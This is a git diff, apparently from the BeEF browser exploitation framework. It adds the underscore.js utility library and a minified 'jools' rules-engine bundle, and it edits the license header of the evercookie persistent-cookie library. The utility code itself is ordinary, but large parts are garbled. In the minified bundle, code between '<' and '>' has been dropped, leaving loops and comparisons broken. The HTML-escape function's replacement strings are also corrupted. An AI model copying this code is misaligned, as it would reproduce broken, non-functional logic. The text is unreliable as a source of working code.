Infinity}; + each(obj, function(value, index, list) { + var computed = iterator ? iterator.call(context, value, index, list) : value; + computed < result.computed && (result = {value : value, computed : computed}); + }); + return result.value; + }; + + // Shuffle an array. + _.shuffle = function(obj) { + var shuffled = [], rand; + each(obj, function(value, index, list) { + rand = Math.floor(Math.random() * (index + 1)); + shuffled[index] = shuffled[rand]; + shuffled[rand] = value; + }); + return shuffled; + }; + + // Sort the object's values by a criterion produced by an iterator. + _.sortBy = function(obj, val, context) { + var iterator = _.isFunction(val) ? val : function(obj) { return obj[val]; }; + return _.pluck(_.map(obj, function(value, index, list) { + return { + value : value, + criteria : iterator.call(context, value, index, list) + }; + }).sort(function(left, right) { + var a = left.criteria, b = right.criteria; + if (a === void 0) return 1; + if (b === void 0) return -1; + return a < b ? -1 : a > b ? 1 : 0; + }), 'value'); + }; + + // Groups the object's values by a criterion. Pass either a string attribute + // to group by, or a function that returns the criterion. + _.groupBy = function(obj, val) { + var result = {}; + var iterator = _.isFunction(val) ? val : function(obj) { return obj[val]; }; + each(obj, function(value, index) { + var key = iterator(value, index); + (result[key] || (result[key] = [])).push(value); + }); + return result; + }; + + // Use a comparator function to figure out at what index an object should + // be inserted so as to maintain order. Uses binary search. + _.sortedIndex = function(array, obj, iterator) { + iterator || (iterator = _.identity); + var low = 0, high = array.length; + while (low < high) { + var mid = (low + high) >> 1; + iterator(array[mid]) < iterator(obj) ? low = mid + 1 : high = mid; + } + return low; + }; + + // Safely convert anything iterable into a real, live array. + _.toArray = function(obj) { + if (!obj) return []; + if (_.isArray(obj)) return slice.call(obj); + if (_.isArguments(obj)) return slice.call(obj); + if (obj.toArray && _.isFunction(obj.toArray)) return obj.toArray(); + return _.values(obj); + }; + + // Return the number of elements in an object. + _.size = function(obj) { + return _.isArray(obj) ? obj.length : _.keys(obj).length; + }; + + // Array Functions + // --------------- + + // Get the first element of an array. Passing **n** will return the first N + // values in the array. Aliased as `head` and `take`. The **guard** check + // allows it to work with `_.map`. + _.first = _.head = _.take = function(array, n, guard) { + return (n != null) && !guard ? slice.call(array, 0, n) : array[0]; + }; + + // Returns everything but the last entry of the array. Especcialy useful on + // the arguments object. Passing **n** will return all the values in + // the array, excluding the last N. The **guard** check allows it to work with + // `_.map`. + _.initial = function(array, n, guard) { + return slice.call(array, 0, array.length - ((n == null) || guard ? 1 : n)); + }; + + // Get the last element of an array. Passing **n** will return the last N + // values in the array. The **guard** check allows it to work with `_.map`. + _.last = function(array, n, guard) { + if ((n != null) && !guard) { + return slice.call(array, Math.max(array.length - n, 0)); + } else { + return array[array.length - 1]; + } + }; + + // Returns everything but the first entry of the array. Aliased as `tail`. + // Especially useful on the arguments object. Passing an **index** will return + // the rest of the values in the array from that index onward. The **guard** + // check allows it to work with `_.map`. + _.rest = _.tail = function(array, index, guard) { + return slice.call(array, (index == null) || guard ? 1 : index); + }; + + // Trim out all falsy values from an array. + _.compact = function(array) { + return _.filter(array, function(value){ return !!value; }); + }; + + // Return a completely flattened version of an array. + _.flatten = function(array, shallow) { + return _.reduce(array, function(memo, value) { + if (_.isArray(value)) return memo.concat(shallow ? value : _.flatten(value)); + memo[memo.length] = value; + return memo; + }, []); + }; + + // Return a version of the array that does not contain the specified value(s). + _.without = function(array) { + return _.difference(array, slice.call(arguments, 1)); + }; + + // Produce a duplicate-free version of the array. If the array has already + // been sorted, you have the option of using a faster algorithm. + // Aliased as `unique`. + _.uniq = _.unique = function(array, isSorted, iterator) { + var initial = iterator ? _.map(array, iterator) : array; + var results = []; + // The `isSorted` flag is irrelevant if the array only contains two elements. + if (array.length < 3) isSorted = true; + _.reduce(initial, function (memo, value, index) { + if (isSorted ? _.last(memo) !== value || !memo.length : !_.include(memo, value)) { + memo.push(value); + results.push(array[index]); + } + return memo; + }, []); + return results; + }; + + // Produce an array that contains the union: each distinct element from all of + // the passed-in arrays. + _.union = function() { + return _.uniq(_.flatten(arguments, true)); + }; + + // Produce an array that contains every item shared between all the + // passed-in arrays. (Aliased as "intersect" for back-compat.) + _.intersection = _.intersect = function(array) { + var rest = slice.call(arguments, 1); + return _.filter(_.uniq(array), function(item) { + return _.every(rest, function(other) { + return _.indexOf(other, item) >= 0; + }); + }); + }; + + // Take the difference between one array and a number of other arrays. + // Only the elements present in just the first array will remain. + _.difference = function(array) { + var rest = _.flatten(slice.call(arguments, 1), true); + return _.filter(array, function(value){ return !_.include(rest, value); }); + }; + + // Zip together multiple lists into a single array -- elements that share + // an index go together. + _.zip = function() { + var args = slice.call(arguments); + var length = _.max(_.pluck(args, 'length')); + var results = new Array(length); + for (var i = 0; i < length; i++) results[i] = _.pluck(args, "" + i); + return results; + }; + + // If the browser doesn't supply us with indexOf (I'm looking at you, **MSIE**), + // we need this function. Return the position of the first occurrence of an + // item in an array, or -1 if the item is not included in the array. + // Delegates to **ECMAScript 5**'s native `indexOf` if available. + // If the array is large and already in sort order, pass `true` + // for **isSorted** to use binary search. + _.indexOf = function(array, item, isSorted) { + if (array == null) return -1; + var i, l; + if (isSorted) { + i = _.sortedIndex(array, item); + return array[i] === item ? i : -1; + } + if (nativeIndexOf && array.indexOf === nativeIndexOf) return array.indexOf(item); + for (i = 0, l = array.length; i < l; i++) if (i in array && array[i] === item) return i; + return -1; + }; + + // Delegates to **ECMAScript 5**'s native `lastIndexOf` if available. + _.lastIndexOf = function(array, item) { + if (array == null) return -1; + if (nativeLastIndexOf && array.lastIndexOf === nativeLastIndexOf) return array.lastIndexOf(item); + var i = array.length; + while (i--) if (i in array && array[i] === item) return i; + return -1; + }; + + // Generate an integer Array containing an arithmetic progression. A port of + // the native Python `range()` function. See + // [the Python documentation](http://docs.python.org/library/functions.html#range). + _.range = function(start, stop, step) { + if (arguments.length <= 1) { + stop = start || 0; + start = 0; + } + step = arguments[2] || 1; + + var len = Math.max(Math.ceil((stop - start) / step), 0); + var idx = 0; + var range = new Array(len); + + while(idx < len) { + range[idx++] = start; + start += step; + } + + return range; + }; + + // Function (ahem) Functions + // ------------------ + + // Reusable constructor function for prototype setting. + var ctor = function(){}; + + // Create a function bound to a given object (assigning `this`, and arguments, + // optionally). Binding with arguments is also known as `curry`. + // Delegates to **ECMAScript 5**'s native `Function.bind` if available. + // We check for `func.bind` first, to fail fast when `func` is undefined. + _.bind = function bind(func, context) { + var bound, args; + if (func.bind === nativeBind && nativeBind) return nativeBind.apply(func, slice.call(arguments, 1)); + if (!_.isFunction(func)) throw new TypeError; + args = slice.call(arguments, 2); + return bound = function() { + if (!(this instanceof bound)) return func.apply(context, args.concat(slice.call(arguments))); + ctor.prototype = func.prototype; + var self = new ctor; + var result = func.apply(self, args.concat(slice.call(arguments))); + if (Object(result) === result) return result; + return self; + }; + }; + + // Bind all of an object's methods to that object. Useful for ensuring that + // all callbacks defined on an object belong to it. + _.bindAll = function(obj) { + var funcs = slice.call(arguments, 1); + if (funcs.length == 0) funcs = _.functions(obj); + each(funcs, function(f) { obj[f] = _.bind(obj[f], obj); }); + return obj; + }; + + // Memoize an expensive function by storing its results. + _.memoize = function(func, hasher) { + var memo = {}; + hasher || (hasher = _.identity); + return function() { + var key = hasher.apply(this, arguments); + return _.has(memo, key) ? memo[key] : (memo[key] = func.apply(this, arguments)); + }; + }; + + // Delays a function for the given number of milliseconds, and then calls + // it with the arguments supplied. + _.delay = function(func, wait) { + var args = slice.call(arguments, 2); + return setTimeout(function(){ return func.apply(null, args); }, wait); + }; + + // Defers a function, scheduling it to run after the current call stack has + // cleared. + _.defer = function(func) { + return _.delay.apply(_, [func, 1].concat(slice.call(arguments, 1))); + }; + + // Returns a function, that, when invoked, will only be triggered at most once + // during a given window of time. + _.throttle = function(func, wait) { + var context, args, timeout, throttling, more, result; + var whenDone = _.debounce(function(){ more = throttling = false; }, wait); + return function() { + context = this; args = arguments; + var later = function() { + timeout = null; + if (more) func.apply(context, args); + whenDone(); + }; + if (!timeout) timeout = setTimeout(later, wait); + if (throttling) { + more = true; + } else { + result = func.apply(context, args); + } + whenDone(); + throttling = true; + return result; + }; + }; + + // Returns a function, that, as long as it continues to be invoked, will not + // be triggered. The function will be called after it stops being called for + // N milliseconds. If `immediate` is passed, trigger the function on the + // leading edge, instead of the trailing. + _.debounce = function(func, wait, immediate) { + var timeout; + return function() { + var context = this, args = arguments; + var later = function() { + timeout = null; + if (!immediate) func.apply(context, args); + }; + if (immediate && !timeout) func.apply(context, args); + clearTimeout(timeout); + timeout = setTimeout(later, wait); + }; + }; + + // Returns a function that will be executed at most one time, no matter how + // often you call it. Useful for lazy initialization. + _.once = function(func) { + var ran = false, memo; + return function() { + if (ran) return memo; + ran = true; + return memo = func.apply(this, arguments); + }; + }; + + // Returns the first function passed as an argument to the second, + // allowing you to adjust arguments, run code before and after, and + // conditionally execute the original function. + _.wrap = function(func, wrapper) { + return function() { + var args = [func].concat(slice.call(arguments, 0)); + return wrapper.apply(this, args); + }; + }; + + // Returns a function that is the composition of a list of functions, each + // consuming the return value of the function that follows. + _.compose = function() { + var funcs = arguments; + return function() { + var args = arguments; + for (var i = funcs.length - 1; i >= 0; i--) { + args = [funcs[i].apply(this, args)]; + } + return args[0]; + }; + }; + + // Returns a function that will only be executed after being called N times. + _.after = function(times, func) { + if (times <= 0) return func(); + return function() { + if (--times < 1) { return func.apply(this, arguments); } + }; + }; + + // Object Functions + // ---------------- + + // Retrieve the names of an object's properties. + // Delegates to **ECMAScript 5**'s native `Object.keys` + _.keys = nativeKeys || function(obj) { + if (obj !== Object(obj)) throw new TypeError('Invalid object'); + var keys = []; + for (var key in obj) if (_.has(obj, key)) keys[keys.length] = key; + return keys; + }; + + // Retrieve the values of an object's properties. + _.values = function(obj) { + return _.map(obj, _.identity); + }; + + // Return a sorted list of the function names available on the object. + // Aliased as `methods` + _.functions = _.methods = function(obj) { + var names = []; + for (var key in obj) { + if (_.isFunction(obj[key])) names.push(key); + } + return names.sort(); + }; + + // Extend a given object with all the properties in passed-in object(s). + _.extend = function(obj) { + each(slice.call(arguments, 1), function(source) { + for (var prop in source) { + obj[prop] = source[prop]; + } + }); + return obj; + }; + + // Return a copy of the object only containing the whitelisted properties. + _.pick = function(obj) { + var result = {}; + each(_.flatten(slice.call(arguments, 1)), function(key) { + if (key in obj) result[key] = obj[key]; + }); + return result; + }; + + // Fill in a given object with default properties. + _.defaults = function(obj) { + each(slice.call(arguments, 1), function(source) { + for (var prop in source) { + if (obj[prop] == null) obj[prop] = source[prop]; + } + }); + return obj; + }; + + // Create a (shallow-cloned) duplicate of an object. + _.clone = function(obj) { + if (!_.isObject(obj)) return obj; + return _.isArray(obj) ? obj.slice() : _.extend({}, obj); + }; + + // Invokes interceptor with the obj, and then returns obj. + // The primary purpose of this method is to "tap into" a method chain, in + // order to perform operations on intermediate results within the chain. + _.tap = function(obj, interceptor) { + interceptor(obj); + return obj; + }; + + // Internal recursive comparison function. + function eq(a, b, stack) { + // Identical objects are equal. `0 === -0`, but they aren't identical. + // See the Harmony `egal` proposal: http://wiki.ecmascript.org/doku.php?id=harmony:egal. + if (a === b) return a !== 0 || 1 / a == 1 / b; + // A strict comparison is necessary because `null == undefined`. + if (a == null || b == null) return a === b; + // Unwrap any wrapped objects. + if (a._chain) a = a._wrapped; + if (b._chain) b = b._wrapped; + // Invoke a custom `isEqual` method if one is provided. + if (a.isEqual && _.isFunction(a.isEqual)) return a.isEqual(b); + if (b.isEqual && _.isFunction(b.isEqual)) return b.isEqual(a); + // Compare `[[Class]]` names. + var className = toString.call(a); + if (className != toString.call(b)) return false; + switch (className) { + // Strings, numbers, dates, and booleans are compared by value. + case '[object String]': + // Primitives and their corresponding object wrappers are equivalent; thus, `"5"` is + // equivalent to `new String("5")`. + return a == String(b); + case '[object Number]': + // `NaN`s are equivalent, but non-reflexive. An `egal` comparison is performed for + // other numeric values. + return a != +a ? b != +b : (a == 0 ? 1 / a == 1 / b : a == +b); + case '[object Date]': + case '[object Boolean]': + // Coerce dates and booleans to numeric primitive values. Dates are compared by their + // millisecond representations. Note that invalid dates with millisecond representations + // of `NaN` are not equivalent. + return +a == +b; + // RegExps are compared by their source patterns and flags. + case '[object RegExp]': + return a.source == b.source && + a.global == b.global && + a.multiline == b.multiline && + a.ignoreCase == b.ignoreCase; + } + if (typeof a != 'object' || typeof b != 'object') return false; + // Assume equality for cyclic structures. The algorithm for detecting cyclic + // structures is adapted from ES 5.1 section 15.12.3, abstract operation `JO`. + var length = stack.length; + while (length--) { + // Linear search. Performance is inversely proportional to the number of + // unique nested structures. + if (stack[length] == a) return true; + } + // Add the first object to the stack of traversed objects. + stack.push(a); + var size = 0, result = true; + // Recursively compare objects and arrays. + if (className == '[object Array]') { + // Compare array lengths to determine if a deep comparison is necessary. + size = a.length; + result = size == b.length; + if (result) { + // Deep compare the contents, ignoring non-numeric properties. + while (size--) { + // Ensure commutative equality for sparse arrays. + if (!(result = size in a == size in b && eq(a[size], b[size], stack))) break; + } + } + } else { + // Objects with different constructors are not equivalent. + if ('constructor' in a != 'constructor' in b || a.constructor != b.constructor) return false; + // Deep compare objects. + for (var key in a) { + if (_.has(a, key)) { + // Count the expected number of properties. + size++; + // Deep compare each member. + if (!(result = _.has(b, key) && eq(a[key], b[key], stack))) break; + } + } + // Ensure that both objects contain the same number of properties. + if (result) { + for (key in b) { + if (_.has(b, key) && !(size--)) break; + } + result = !size; + } + } + // Remove the first object from the stack of traversed objects. + stack.pop(); + return result; + } + + // Perform a deep comparison to check if two objects are equal. + _.isEqual = function(a, b) { + return eq(a, b, []); + }; + + // Is a given array, string, or object empty? + // An "empty" object has no enumerable own-properties. + _.isEmpty = function(obj) { + if (obj == null) return true; + if (_.isArray(obj) || _.isString(obj)) return obj.length === 0; + for (var key in obj) if (_.has(obj, key)) return false; + return true; + }; + + // Is a given value a DOM element? + _.isElement = function(obj) { + return !!(obj && obj.nodeType == 1); + }; + + // Is a given value an array? + // Delegates to ECMA5's native Array.isArray + _.isArray = nativeIsArray || function(obj) { + return toString.call(obj) == '[object Array]'; + }; + + // Is a given variable an object? + _.isObject = function(obj) { + return obj === Object(obj); + }; + + // Is a given variable an arguments object? + _.isArguments = function(obj) { + return toString.call(obj) == '[object Arguments]'; + }; + if (!_.isArguments(arguments)) { + _.isArguments = function(obj) { + return !!(obj && _.has(obj, 'callee')); + }; + } + + // Is a given value a function? + _.isFunction = function(obj) { + return toString.call(obj) == '[object Function]'; + }; + + // Is a given value a string? + _.isString = function(obj) { + return toString.call(obj) == '[object String]'; + }; + + // Is a given value a number? + _.isNumber = function(obj) { + return toString.call(obj) == '[object Number]'; + }; + + // Is a given object a finite number? + _.isFinite = function(obj) { + return _.isNumber(obj) && isFinite(obj); + }; + + // Is the given value `NaN`? + _.isNaN = function(obj) { + // `NaN` is the only value for which `===` is not reflexive. + return obj !== obj; + }; + + // Is a given value a boolean? + _.isBoolean = function(obj) { + return obj === true || obj === false || toString.call(obj) == '[object Boolean]'; + }; + + // Is a given value a date? + _.isDate = function(obj) { + return toString.call(obj) == '[object Date]'; + }; + + // Is the given value a regular expression? + _.isRegExp = function(obj) { + return toString.call(obj) == '[object RegExp]'; + }; + + // Is a given value equal to null? + _.isNull = function(obj) { + return obj === null; + }; + + // Is a given variable undefined? + _.isUndefined = function(obj) { + return obj === void 0; + }; + + // Has own property? + _.has = function(obj, key) { + return hasOwnProperty.call(obj, key); + }; + + // Utility Functions + // ----------------- + + // Run Underscore.js in *noConflict* mode, returning the `_` variable to its + // previous owner. Returns a reference to the Underscore object. + _.noConflict = function() { + root._ = previousUnderscore; + return this; + }; + + // Keep the identity function around for default iterators. + _.identity = function(value) { + return value; + }; + + // Run a function **n** times. + _.times = function (n, iterator, context) { + for (var i = 0; i < n; i++) iterator.call(context, i); + }; + + // Escape a string for HTML interpolation. + _.escape = function(string) { + return (''+string).replace(/&/g, '&').replace(//g, '>').replace(/"/g, '"').replace(/'/g, ''').replace(/\//g,'/'); + }; + + // If the value of the named property is a function then invoke it; + // otherwise, return it. + _.result = function(object, property) { + if (object == null) return null; + var value = object[property]; + return _.isFunction(value) ? value.call(object) : value; + }; + + // Add your own custom functions to the Underscore object, ensuring that + // they're correctly added to the OOP wrapper as well. + _.mixin = function(obj) { + each(_.functions(obj), function(name){ + addToWrapper(name, _[name] = obj[name]); + }); + }; + + // Generate a unique integer id (unique within the entire client session). + // Useful for temporary DOM ids. + var idCounter = 0; + _.uniqueId = function(prefix) { + var id = idCounter++; + return prefix ? prefix + id : id; + }; + + // By default, Underscore uses ERB-style template delimiters, change the + // following template settings to use alternative delimiters. + _.templateSettings = { + evaluate : /<%([\s\S]+?)%>/g, + interpolate : /<%=([\s\S]+?)%>/g, + escape : /<%-([\s\S]+?)%>/g + }; + + // When customizing `templateSettings`, if you don't want to define an + // interpolation, evaluation or escaping regex, we need one that is + // guaranteed not to match. + var noMatch = /.^/; + + // Certain characters need to be escaped so that they can be put into a + // string literal. + var escapes = { + '\\': '\\', + "'": "'", + 'r': '\r', + 'n': '\n', + 't': '\t', + 'u2028': '\u2028', + 'u2029': '\u2029' + }; + + for (var p in escapes) escapes[escapes[p]] = p; + var escaper = /\\|'|\r|\n|\t|\u2028|\u2029/g; + var unescaper = /\\(\\|'|r|n|t|u2028|u2029)/g; + + // Within an interpolation, evaluation, or escaping, remove HTML escaping + // that had been previously added. + var unescape = function(code) { + return code.replace(unescaper, function(match, escape) { + return escapes[escape]; + }); + }; + + // JavaScript micro-templating, similar to John Resig's implementation. + // Underscore templating handles arbitrary delimiters, preserves whitespace, + // and correctly escapes quotes within interpolated code. + _.template = function(text, data, settings) { + settings = _.defaults(settings || {}, _.templateSettings); + + // Compile the template source, taking care to escape characters that + // cannot be included in a string literal and then unescape them in code + // blocks. + var source = "__p+='" + text + .replace(escaper, function(match) { + return '\\' + escapes[match]; + }) + .replace(settings.escape || noMatch, function(match, code) { + return "'+\n_.escape(" + unescape(code) + ")+\n'"; + }) + .replace(settings.interpolate || noMatch, function(match, code) { + return "'+\n(" + unescape(code) + ")+\n'"; + }) + .replace(settings.evaluate || noMatch, function(match, code) { + return "';\n" + unescape(code) + "\n;__p+='"; + }) + "';\n"; + + // If a variable is not specified, place data values in local scope. + if (!settings.variable) source = 'with(obj||{}){\n' + source + '}\n'; + + source = "var __p='';" + + "var print=function(){__p+=Array.prototype.join.call(arguments, '')};\n" + + source + "return __p;\n"; + + var render = new Function(settings.variable || 'obj', '_', source); + if (data) return render(data, _); + var template = function(data) { + return render.call(this, data, _); + }; + + // Provide the compiled function source as a convenience for build time + // precompilation. + template.source = 'function(' + (settings.variable || 'obj') + '){\n' + + source + '}'; + + return template; + }; + + // Add a "chain" function, which will delegate to the wrapper. + _.chain = function(obj) { + return _(obj).chain(); + }; + + // The OOP Wrapper + // --------------- + + // If Underscore is called as a function, it returns a wrapped object that + // can be used OO-style. This wrapper holds altered versions of all the + // underscore functions. Wrapped objects may be chained. + var wrapper = function(obj) { this._wrapped = obj; }; + + // Expose `wrapper.prototype` as `_.prototype` + _.prototype = wrapper.prototype; + + // Helper function to continue chaining intermediate results. + var result = function(obj, chain) { + return chain ? _(obj).chain() : obj; + }; + + // A method to easily add functions to the OOP wrapper. + var addToWrapper = function(name, func) { + wrapper.prototype[name] = function() { + var args = slice.call(arguments); + unshift.call(args, this._wrapped); + return result(func.apply(_, args), this._chain); + }; + }; + + // Add all of the Underscore functions to the wrapper object. + _.mixin(_); + + // Add all mutator Array functions to the wrapper. + each(['pop', 'push', 'reverse', 'shift', 'sort', 'splice', 'unshift'], function(name) { + var method = ArrayProto[name]; + wrapper.prototype[name] = function() { + var wrapped = this._wrapped; + method.apply(wrapped, arguments); + var length = wrapped.length; + if ((name == 'shift' || name == 'splice') && length === 0) delete wrapped[0]; + return result(wrapped, this._chain); + }; + }); + + // Add all accessor Array functions to the wrapper. + each(['concat', 'join', 'slice'], function(name) { + var method = ArrayProto[name]; + wrapper.prototype[name] = function() { + return result(method.apply(this._wrapped, arguments), this._chain); + }; + }); + + // Start chaining a wrapped Underscore object. + wrapper.prototype.chain = function() { + this._chain = true; + return this; + }; + + // Extracts the result from a wrapped and chained object. + wrapper.prototype.value = function() { + return this._wrapped; + }; + +}).call(this); + +}); diff --git a/core/main/client/lib/evercookie.js b/core/main/client/lib/evercookie.js index 4eb1be6d6..f723f6a46 100644 --- a/core/main/client/lib/evercookie.js +++ b/core/main/client/lib/evercookie.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* * evercookie 0.4 (10/13/2010) -- extremely persistent cookies * diff --git a/core/main/client/lib/jools.min.js b/core/main/client/lib/jools.min.js new file mode 100644 index 000000000..daf16b60d --- /dev/null +++ b/core/main/client/lib/jools.min.js @@ -0,0 +1 @@ +var require=function(file,cwd){var resolved=require.resolve(file,cwd||"/");var mod=require.modules[resolved];if(!mod){throw new Error("Failed to resolve module "+file+", tried "+resolved)}var res=mod._cached?mod._cached:mod();return res};require.paths=[];require.modules={};require.extensions=[".js",".coffee"];require._core={assert:true,events:true,fs:true,path:true,vm:true};require.resolve=(function(){return function(x,cwd){if(!cwd){cwd="/"}if(require._core[x]){return x}var path=require.modules.path();cwd=path.resolve("/",cwd);var y=cwd||"/";if(x.match(/^(?:\.\.?\/|\/)/)){var m=loadAsFileSync(path.resolve(y,x))||loadAsDirectorySync(path.resolve(y,x));if(m){return m}}var n=loadNodeModulesSync(x,y);if(n){return n}throw new Error("Cannot find module '"+x+"'");function loadAsFileSync(x){if(require.modules[x]){return x}for(var i=0;i=0;i--){if(parts[i]==="node_modules"){continue}var dir=parts.slice(0,i+1).join("/")+"/node_modules";dirs.push(dir)}return dirs}}})();require.alias=function(from,to){var path=require.modules.path();var res=null;try{res=require.resolve(from+"/package.json","/")}catch(err){res=require.resolve(from,"/")}var basedir=path.dirname(res);var keys=(Object.keys||function(obj){var res=[];for(var key in obj){res.push(key)}return res})(require.modules);for(var i=0;i0){var fn=queue.shift();fn()}}},true)}return function(fn){if(canPost){queue.push(fn);window.postMessage("browserify-tick","*")}else{setTimeout(fn,0)}}})()}if(!process.title){process.title="browser"}if(!process.binding){process.binding=function(name){if(name==="evals"){return require("vm")}else{throw new Error("No such module")}}}if(!process.cwd){process.cwd=function(){return"."}}if(!process.env){process.env={}}if(!process.argv){process.argv=[]}require.define("path",function(require,module,exports,__dirname,__filename){function filter(xs,fn){var res=[];for(var i=0;i=0;i--){var last=parts[i];if(last=="."){parts.splice(i,1)}else{if(last===".."){parts.splice(i,1);up++}else{if(up){parts.splice(i,1);up--}}}}if(allowAboveRoot){for(;up--;up){parts.unshift("..")}}return parts}var splitPathRe=/^(.+\/(?!$)|\/)?((?:.+?)?(\.[^.]*)?)$/;exports.resolve=function(){var resolvedPath="",resolvedAbsolute=false;for(var i=arguments.length;i>=-1&&!resolvedAbsolute;i--){var path=(i>=0)?arguments[i]:process.cwd();if(typeof path!=="string"||!path){continue}resolvedPath=path+"/"+resolvedPath;resolvedAbsolute=path.charAt(0)==="/"}resolvedPath=normalizeArray(filter(resolvedPath.split("/"),function(p){return !!p}),!resolvedAbsolute).join("/");return((resolvedAbsolute?"/":"")+resolvedPath)||"."};exports.normalize=function(path){var isAbsolute=path.charAt(0)==="/",trailingSlash=path.slice(-1)==="/";path=normalizeArray(filter(path.split("/"),function(p){return !!p}),!isAbsolute).join("/");if(!path&&!isAbsolute){path="."}if(path&&trailingSlash){path+="/"}return(isAbsolute?"/":"")+path};exports.join=function(){var paths=Array.prototype.slice.call(arguments,0);return exports.normalize(filter(paths,function(p,index){return p&&typeof p==="string"}).join("/"))};exports.dirname=function(path){var dir=splitPathRe.exec(path)[1]||"";var isWindows=false;if(!dir){return"."}else{if(dir.length===1||(isWindows&&dir.length<=3&&dir.charAt(1)===":")){return dir}else{return dir.substring(0,dir.length-1)}}};exports.basename=function(path,ext){var f=splitPathRe.exec(path)[2]||"";if(ext&&f.substr(-1*ext.length)===ext){f=f.substr(0,f.length-ext.length)}return f};exports.extname=function(path){return splitPathRe.exec(path)[3]||""}});require.define("/node_modules/jools/package.json",function(require,module,exports,__dirname,__filename){module.exports={main:"./lib/jools"}});require.define("/node_modules/jools/lib/jools.js",function(require,module,exports,__dirname,__filename){var utils=require("./utils"),_=require("underscore");exports.version="0.0.1";function Jools(rules){this.rules=rules}Jools.prototype.execute=function(fact){var self=this,session=_.clone(fact),last_session=_.clone(fact),goal=false;while(!goal){var changes=false;for(var x=0;x2;if(obj==null){obj=[]}if(nativeReduce&&obj.reduce===nativeReduce){if(context){iterator=_.bind(iterator,context)}return initial?obj.reduce(iterator,memo):obj.reduce(iterator)}each(obj,function(value,index,list){if(!initial){memo=value;initial=true}else{memo=iterator.call(context,memo,value,index,list)}});if(!initial){throw new TypeError("Reduce of empty array with no initial value")}return memo};_.reduceRight=_.foldr=function(obj,iterator,memo,context){var initial=arguments.length>2;if(obj==null){obj=[]}if(nativeReduceRight&&obj.reduceRight===nativeReduceRight){if(context){iterator=_.bind(iterator,context)}return initial?obj.reduceRight(iterator,memo):obj.reduceRight(iterator)}var reversed=_.toArray(obj).reverse();if(context&&!initial){iterator=_.bind(iterator,context)}return initial?_.reduce(reversed,iterator,memo,context):_.reduce(reversed,iterator)};_.find=_.detect=function(obj,iterator,context){var result;any(obj,function(value,index,list){if(iterator.call(context,value,index,list)){result=value;return true}});return result};_.filter=_.select=function(obj,iterator,context){var results=[];if(obj==null){return results}if(nativeFilter&&obj.filter===nativeFilter){return obj.filter(iterator,context)}each(obj,function(value,index,list){if(iterator.call(context,value,index,list)){results[results.length]=value}});return results};_.reject=function(obj,iterator,context){var results=[];if(obj==null){return results}each(obj,function(value,index,list){if(!iterator.call(context,value,index,list)){results[results.length]=value}});return results};_.every=_.all=function(obj,iterator,context){var result=true;if(obj==null){return result}if(nativeEvery&&obj.every===nativeEvery){return obj.every(iterator,context)}each(obj,function(value,index,list){if(!(result=result&&iterator.call(context,value,index,list))){return breaker}});return !!result};var any=_.some=_.any=function(obj,iterator,context){iterator||(iterator=_.identity);var result=false;if(obj==null){return result}if(nativeSome&&obj.some===nativeSome){return obj.some(iterator,context)}each(obj,function(value,index,list){if(result||(result=iterator.call(context,value,index,list))){return breaker}});return !!result};_.include=_.contains=function(obj,target){var found=false;if(obj==null){return found}if(nativeIndexOf&&obj.indexOf===nativeIndexOf){return obj.indexOf(target)!=-1}found=any(obj,function(value){return value===target});return found};_.invoke=function(obj,method){var args=slice.call(arguments,2);return _.map(obj,function(value){return(_.isFunction(method)?method||value:value[method]).apply(value,args)})};_.pluck=function(obj,key){return _.map(obj,function(value){return value[key]})};_.max=function(obj,iterator,context){if(!iterator&&_.isArray(obj)&&obj[0]===+obj[0]){return Math.max.apply(Math,obj)}if(!iterator&&_.isEmpty(obj)){return -Infinity}var result={computed:-Infinity};each(obj,function(value,index,list){var computed=iterator?iterator.call(context,value,index,list):value;computed>=result.computed&&(result={value:value,computed:computed})});return result.value};_.min=function(obj,iterator,context){if(!iterator&&_.isArray(obj)&&obj[0]===+obj[0]){return Math.min.apply(Math,obj)}if(!iterator&&_.isEmpty(obj)){return Infinity}var result={computed:Infinity};each(obj,function(value,index,list){var computed=iterator?iterator.call(context,value,index,list):value;computedb?1:0}),"value")};_.groupBy=function(obj,val){var result={};var iterator=_.isFunction(val)?val:function(obj){return obj[val]};each(obj,function(value,index){var key=iterator(value,index);(result[key]||(result[key]=[])).push(value)});return result};_.sortedIndex=function(array,obj,iterator){iterator||(iterator=_.identity);var low=0,high=array.length;while(low>1;iterator(array[mid])=0})})};_.difference=function(array){var rest=_.flatten(slice.call(arguments,1),true);return _.filter(array,function(value){return !_.include(rest,value)})};_.zip=function(){var args=slice.call(arguments);var length=_.max(_.pluck(args,"length"));var results=new Array(length);for(var i=0;i=0;i--){args=[funcs[i].apply(this,args)]}return args[0]}};_.after=function(times,func){if(times<=0){return func()}return function(){if(--times<1){return func.apply(this,arguments)}}};_.keys=nativeKeys||function(obj){if(obj!==Object(obj)){throw new TypeError("Invalid object")}var keys=[];for(var key in obj){if(_.has(obj,key)){keys[keys.length]=key}}return keys};_.values=function(obj){return _.map(obj,_.identity)};_.functions=_.methods=function(obj){var names=[];for(var key in obj){if(_.isFunction(obj[key])){names.push(key)}}return names.sort()};_.extend=function(obj){each(slice.call(arguments,1),function(source){for(var prop in source){obj[prop]=source[prop]}});return obj};_.pick=function(obj){var result={};each(_.flatten(slice.call(arguments,1)),function(key){if(key in obj){result[key]=obj[key]}});return result};_.defaults=function(obj){each(slice.call(arguments,1),function(source){for(var prop in source){if(obj[prop]==null){obj[prop]=source[prop]}}});return obj};_.clone=function(obj){if(!_.isObject(obj)){return obj}return _.isArray(obj)?obj.slice():_.extend({},obj)};_.tap=function(obj,interceptor){interceptor(obj);return obj};function eq(a,b,stack){if(a===b){return a!==0||1/a==1/b}if(a==null||b==null){return a===b}if(a._chain){a=a._wrapped}if(b._chain){b=b._wrapped}if(a.isEqual&&_.isFunction(a.isEqual)){return a.isEqual(b)}if(b.isEqual&&_.isFunction(b.isEqual)){return b.isEqual(a)}var className=toString.call(a);if(className!=toString.call(b)){return false}switch(className){case"[object String]":return a==String(b);case"[object Number]":return 